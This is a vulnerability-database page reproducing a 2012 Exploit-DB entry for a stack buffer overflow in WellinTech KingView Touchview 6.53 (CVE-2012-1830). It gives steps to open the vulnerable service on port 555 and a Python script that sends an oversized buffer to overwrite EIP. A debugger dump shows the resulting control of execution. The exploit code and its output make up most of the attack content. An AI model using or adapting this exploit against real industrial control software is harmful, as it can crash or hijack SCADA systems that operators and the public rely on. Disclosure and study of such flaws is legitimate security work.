Kingview Touchview 6.53 - EIP Overwrite
🗓️ 25 Jun 2012 00:00:00Reported by Carlos Mario Penagos HollmannType
exploitdb🔗 www.exploit-db.com👁 40 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2012-1830 | 25 Jun 201200:00 | – | circl | |
| WellinTech KingView Buffer Overflow - Ver2 (CVE-2011-0406; CVE-2012-1830) | 1 Jul 201800:00 | – | checkpoint_advisories | |
| CVE-2012-1830 | 5 Jul 201201:00 | – | cve | |
| CVE-2012-1830 | 5 Jul 201201:00 | – | cvelist | |
| WellinTech KingView Multiple Vulnerabilities | 6 Apr 201206:00 | – | ics | |
| CVE-2012-1830 | 5 Jul 201203:23 | – | nvd | |
| WellinTech KingView Multiple Vulnerabilities | 10 Jul 201200:00 | – | openvas | |
| Stack overflow | 5 Jul 201203:23 | – | prion | |
| CVE-2012-1830 | 22 May 202505:02 | – | redhatcve | |
| WellinTech KingView 6.53 < 2012-03-22 Multiple Vulnerabilities | 5 Jun 201200:00 | – | nessus |
10
# Exploit Title: Kingview Touchview EIP direct control
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.kingview.com
# Version: 6.53
# Tested on: Windows SP 1
# CVE :
Open kingivew click on Make choose network configuration--->network
parameter , then go to the node type and choose Local is a Login Server,
run the demo port 555 will be open.
NOTE:
This was already patched by the vendor silently.
import os
import socket
import sys
host ="10.0.2.15"
port = 555
exploit = ("\x90"*1024)
exploit += ("A"*23976)
exploit += ("B"*12500)
exploit += ("D"*6250)
exploit += ("E"*6002)
exploit += ("\x44\x43\x42\x41")
exploit += ("\x90"*256)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(exploit)
data = s.recv(1024)
print " [+] Closing connection.."
s.close()
print " [+] Done!"
eax=7ffdf000 ebx=00000000 ecx=40000000 edx=00000008 esi=41424344
edi=0012f6b4
eip=41424344 esp=0012f650 ebp=0012f678 iopl=0 nv up ei pl nz na po
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010202
41424344 ??
CALL TO STACK
0x41424344
USER32!GetDC+0x6d
USER32!EnumDisplaySettingsA+0x27d
USER32!EnumDisplaySettingsA+0xc9
USER32!DefDlgProcA+0x22Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Jul 2012 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 210
EPSS0.07654